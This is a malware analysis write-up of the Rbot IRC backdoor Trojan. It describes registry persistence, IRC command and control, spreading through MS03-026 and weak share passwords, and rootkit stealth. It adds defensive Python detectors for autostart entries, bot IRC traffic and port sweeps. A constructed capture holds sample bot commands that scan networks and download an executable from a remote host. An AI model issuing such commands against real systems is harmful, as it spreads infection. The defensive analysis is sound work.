Backdoor:Win32/Rbot.gen!A is a family of backdoor Trojans that allows attackers to control infected computers. After a computer is infected, the Trojan connects to a specific IRC server and joins a specific channel to receive commands from attackers. Commands can instruct the Trojan to spread to other computers by scanning for network shares with weak passwords, exploiting Windows vulnerabilities, and spreading through backdoor ports opened by other families of malicious software. The Trojan can also allow attackers to perform other backdoor functions, such as launching denial of service (DoS) attacks and retrieving system information from infected computers.

Installation
When Backdoor:Win32/Rbot.gen!A runs, it copies itself directly into %windir% or <system folder>. In many cases, it adds a value to one or more of the following registry keys:

 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

This change causes the Trojan to run whenever Windows starts. Note that the RunServices keys are processed only by Windows 9x/Me; on Windows NT-based systems the Run keys are the entries that matter. Some variants also install themselves as a Windows system service to achieve the same result, so a persistence check should cover the service list as well as these keys.
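As an added example (Python; not code from the original write-up), the script below parses a .reg export of the four keys listed above and flags autostart values that launch an executable dropped directly into %windir% or the system folder, or given as a bare filename that is resolved through the system search path. The sample export, the executable names in it and the allow-list are constructed for the demonstration; the install drive is assumed to be C:\WINDOWS.

```python
"""
Added example, not from the original page: scan a .reg export of the
Run / RunServices keys for autostart entries that launch an executable
placed directly in %windir% or the system folder, the placement this
Rbot variant uses. Produce the input on a suspect computer with, e.g.:
    reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" run.reg
reg.exe writes UTF-16LE, so read it with open(path, encoding="utf-16").
The export, the file names and the allow-list below are constructed.
"""
import re

# The four autostart keys named in the write-up.
AUTOSTART_KEYS = {
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices",
}

# Executables an analyst has already verified on this image (assumed allow-list).
KNOWN_GOOD = {"ctfmon.exe", "igfxtray.exe"}

# Where the Trojan copies itself: %windir% and the system folder (assumes C:\WINDOWS).
SUSPECT_DIRS = (r"c:\windows", r"c:\windows\system32", r"c:\winnt", r"c:\winnt\system32")

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_export(text):
    """Return {key_path: {value_name: value_data}} for REG_SZ values.

    Undoes the .reg escaping of backslash and quote. Other value types
    (hex:, dword:) are skipped, since autostart commands are strings.
    """
    entries = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            entries.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.groups()
            entries[current][name] = re.sub(r'\\(["\\])', r"\1", data)
    return entries


def expand_env(path):
    """Expand %windir% / %systemroot% if a value uses them (assumes C:\\WINDOWS)."""
    return re.sub(r"%(windir|systemroot)%", r"c:\\windows", path, flags=re.I)


def executable_of(command):
    """Extract the executable from a Run value, dropping its arguments.

    Quoted paths may contain spaces; an unquoted path is cut at the first space.
    """
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]


def suspicious_autostarts(text):
    """Return [(key, value_name, exe)] for entries worth a closer look.

    A bare file name (no directory) is also reported: CreateProcess resolves
    it through the search path, which includes the system folder and %windir%.
    """
    hits = []
    for key, values in parse_reg_export(text).items():
        if key not in AUTOSTART_KEYS:
            continue
        for name, data in values.items():
            exe = expand_env(executable_of(data)).lower()
            directory, _, filename = exe.rpartition("\\")
            if (directory in SUSPECT_DIRS or directory == "") and filename not in KNOWN_GOOD:
                hits.append((key, name, exe))
    return hits


# Constructed export; "wuamgrd.exe" is a hypothetical dropped file name.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\\WINDOWS\\system32\\igfxtray.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Microsoft Update"="C:\\WINDOWS\\wuamgrd.exe"
"Acrobat"="\"C:\\Program Files\\Adobe\\reader_sl.exe\" /s"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Microsoft Update"="wuamgrd.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
'''

if __name__ == "__main__":
    for key, name, exe in suspicious_autostarts(SAMPLE_EXPORT):
        print(f"{key}\n  {name!r} -> {exe}")
```

The allow-list is deliberately small: on a real image, compare the flagged executables against a hash database rather than trusting file names, since the Trojan chooses names that imitate Windows components.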

Command & Control
Backdoor:Win32/Rbot.gen!A connects to an IRC server and joins a specific channel to receive commands. Commands can include actions such as:
- Scanning for unpatched computers on the network.
- Scanning ports on the network.
- Downloading and executing remote files.
- Monitoring network traffic.
- Launching HTTP/HTTPD, SOCKS4, and TFTP/FTP servers.
- Enabling or disabling the DCOM protocol.
- Retrieving computer configuration information, including Windows logon information, user account information, open shares, file system information, and network connection information.
- Logging keystrokes.
- Retrieving CD keys of games.
- Capturing screens and webcam shots.
- Redirecting TCP traffic.
- Uploading files through FTP.
- Sending e-mail.
- Manipulating processes and services.
- Conducting denial of service (DoS) attacks.
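As an added example (Python; not code from the original page), the parser below splits IRC lines into prefix, command and parameters as RFC 1459 defines them, then walks a captured bot session to list the channel the bot joined (with its channel key, if one was sent) and the commands its operator issued there. The session, the nick and channel names, and the dotted command words are all constructed; a real variant uses its own command syntax, so only the structure of the exchange carries over.

```python
"""
Added example, not from the original page: a minimal IRC parser that pulls
operator commands out of a captured bot session, showing what the
"joins a channel and receives commands" phase looks like on the wire.
The session below is constructed; the command words are hypothetical.
"""
from collections import namedtuple

IrcMessage = namedtuple("IrcMessage", "prefix command params")


def parse_irc(line):
    """Split one IRC line into (prefix, command, params) per RFC 1459.

    A leading ':' introduces the prefix (the sender); a later ' :' starts
    the trailing parameter, which may contain spaces (the message body).
    """
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if not params:
        raise ValueError("empty IRC message")
    command = params.pop(0).upper()
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, command, params)


def sender_nick(prefix):
    """'nick!user@host' -> 'nick'; server prefixes carry no '!'."""
    return prefix.split("!", 1)[0] if prefix else None


def extract_bot_commands(session, command_prefix="."):
    """Walk a session of (direction, raw line) pairs and return a report.

    direction is 'C' for client -> server or 'S' for server -> client.
    Channels the client JOINs are recorded with their key; PRIVMSGs from
    other users to those channels that start with command_prefix are
    reported as bot commands. Messages to channels the bot did not join
    and ordinary chatter are ignored.
    """
    joined = {}        # channel -> key or None
    commands = []      # (channel, operator nick, command word, arguments)
    for direction, raw in session:
        msg = parse_irc(raw)
        if direction == "C" and msg.command == "JOIN":
            chans = msg.params[0].split(",")
            keys = msg.params[1].split(",") if len(msg.params) > 1 else []
            for i, chan in enumerate(chans):
                joined[chan] = keys[i] if i < len(keys) else None
        elif direction == "S" and msg.command == "PRIVMSG" and len(msg.params) == 2:
            target, body = msg.params
            if target in joined and body.startswith(command_prefix):
                word, _, args = body[len(command_prefix):].partition(" ")
                commands.append((target, sender_nick(msg.prefix), word, args))
    return {"joined": joined, "commands": commands}


# Constructed capture of a bot's conversation with its controller.
SAMPLE_SESSION = [
    ("C", "NICK [XP]-4211"),
    ("C", "USER xp 0 0 :xp"),
    ("S", ":irc.example.net 001 [XP]-4211 :Welcome"),
    ("C", "JOIN #ctl k3y"),                       # channel key = bot "password"
    ("S", ":[XP]-4211!xp@10.0.0.5 JOIN :#ctl"),
    ("S", ":herder!op@203.0.113.9 PRIVMSG #ctl :.scan 10.0.0.0/16 445"),
    ("S", ":herder!op@203.0.113.9 PRIVMSG #ctl :.download http://203.0.113.9/u.exe"),
    ("S", ":herder!op@203.0.113.9 PRIVMSG #ctl :just chatting"),
    ("S", ":herder!op@203.0.113.9 PRIVMSG #other :.scan 1.2.3.4"),
    ("C", "PRIVMSG #ctl :[SCAN]: started"),       # bot reporting back
]

if __name__ == "__main__":
    report = extract_bot_commands(SAMPLE_SESSION)
    print("joined:", report["joined"])
    for chan, who, word, args in report["commands"]:
        print(f"{chan} <{who}> {word} {args}")
```

Feeding a real capture through this requires splitting the TCP stream by direction first; the channel key and the nick format are the two artefacts that usually identify the botnet across samples.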

Spreads Via..
Exploit/Network Shares/Previous System Compromise
Upon receiving IRC commands, the Trojan can spread to remote computers by exploiting one or more Windows vulnerabilities. Win32/Rbot can also spread to remote computers by trying weak passwords drawn from a built-in list against network shares. The Trojan may exploit the MS03-026 vulnerability (the RPC/DCOM buffer overrun, reached over TCP port 135) to obtain a remote shell on the target computer, and then uses that shell to copy and run itself on the remote computer. The Trojan can also be instructed through IRC commands to spread through backdoor ports opened by Mydoom, Bagle, Optix, NetDevil, and other malicious software families.
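The first step of every spreading method above is a sweep: one infected host opens connections to many addresses on TCP 135/139/445 or on a port another family left open. As an added example (Python; not from the original page), the detector below runs over a constructed connection log and flags any source that attempts a threshold number of distinct destinations on a watched port within a sliding time window, counting only SYNs so that servers receiving fan-in and long-lived sessions are not mistaken for scanners. The log format is constructed for the example; the Mydoom and Bagle port numbers in the watch-list are commonly documented defaults included as an assumption to verify against your own threat intelligence before tuning.

```python
"""
Added example, not from the original page: flag hosts whose outbound
connection pattern matches the spreading behaviour described above, i.e.
one source touching many distinct destinations on the RPC/SMB ports the
MS03-026 and share-password attacks use, or on ports other malware families
leave open. The log lines are constructed; the backdoor port numbers are
commonly documented defaults and are an assumption.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Destination ports tied to the write-up's spreading methods.
WATCH_PORTS = {
    135: "RPC/DCOM (MS03-026)",
    139: "NetBIOS session (share password guessing)",
    445: "SMB (share password guessing)",
    3127: "Mydoom backdoor (assumed default port)",
    2745: "Bagle backdoor (assumed default port)",
}


def parse_conn_line(line):
    """Parse 'timestamp src dst dport flags' (a constructed log format).

    flags is 'S' for a bare SYN (a connection attempt) or 'A' for a packet
    on an established session.
    """
    ts, src, dst, dport, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), flags


def find_scanners(lines, window=timedelta(seconds=60), threshold=20):
    """Return {src: {port: peak distinct destinations}} for sources that
    attempt >= threshold distinct destinations on one watched port within
    any window-long interval. Only SYNs are counted, so replies to a busy
    server and repeated packets of one session do not inflate the count.
    """
    attempts = defaultdict(list)   # (src, port) -> [(ts, dst)]
    for line in lines:
        ts, src, dst, dport, flags = parse_conn_line(line)
        if dport in WATCH_PORTS and flags == "S":
            attempts[(src, dport)].append((ts, dst))

    findings = defaultdict(dict)
    for (src, port), events in attempts.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until events[start] is inside it.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            peak = max(peak, distinct)
        if peak >= threshold:
            findings[src][port] = peak
    return dict(findings)


def build_sample_log():
    """Constructed log: one bot sweeping a /24 on 445, plus benign traffic."""
    base = datetime(2004, 5, 2, 10, 15, 0)
    stamp = lambda s: (base + timedelta(seconds=s)).isoformat()
    lines = []
    # Bot 10.0.0.5 probing 40 hosts on SMB in 40 seconds.
    for i in range(1, 41):
        lines.append(f"{stamp(i)} 10.0.0.5 10.0.3.{i} 445 S")
    # Same bot trying a Mydoom backdoor port on five hosts: below threshold.
    for i in range(1, 6):
        lines.append(f"{stamp(i)} 10.0.0.5 10.0.4.{i} 3127 S")
    # A file server contacted by 30 clients: fan-in, not fan-out, so no alert.
    for i in range(1, 31):
        lines.append(f"{stamp(i)} 10.0.9.{i} 10.0.0.20 445 S")
    # One workstation's established SMB session, one packet a second: one destination.
    for i in range(60):
        lines.append(f"{stamp(i)} 10.0.0.7 10.0.0.20 445 A")
    return lines


if __name__ == "__main__":
    for src, ports in find_scanners(build_sample_log()).items():
        for port, peak in ports.items():
            print(f"{src}: {peak} hosts on {port}/tcp within 60s ({WATCH_PORTS[port]})")
```

Pick the threshold from a baseline of your own network: domain controllers and management hosts legitimately fan out on 135 and 445, so they belong on an exclusion list rather than a higher global threshold.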

Payload
Modifies System Settings/Uses Advanced Stealth
Some variants of the Trojan terminate security-related products. Later variants can install a kernel-mode rootkit driver that hides the Trojan process from Task Manager and other process-viewer applications, so a process list taken on the running system cannot be trusted when such a variant is present.

The exploits this Trojan uses can crash critical system processes (the LSA Shell error report below is the crash dialog for lsass.exe). Windows responds to the loss of such a process with a forced shutdown and restart, and this can repeat in a continuous cycle until the threat is removed. On Windows XP the pending restart can be cancelled with "shutdown -a" to gain time to patch and clean the computer.

The following are examples of the critical system process termination error message and the system shutdown warning messages:
- Operating system shutdown warning dialog box (image not included)
- LSA Shell error report dialog box (image not included)
- Operating system shutdown warning message (image not included)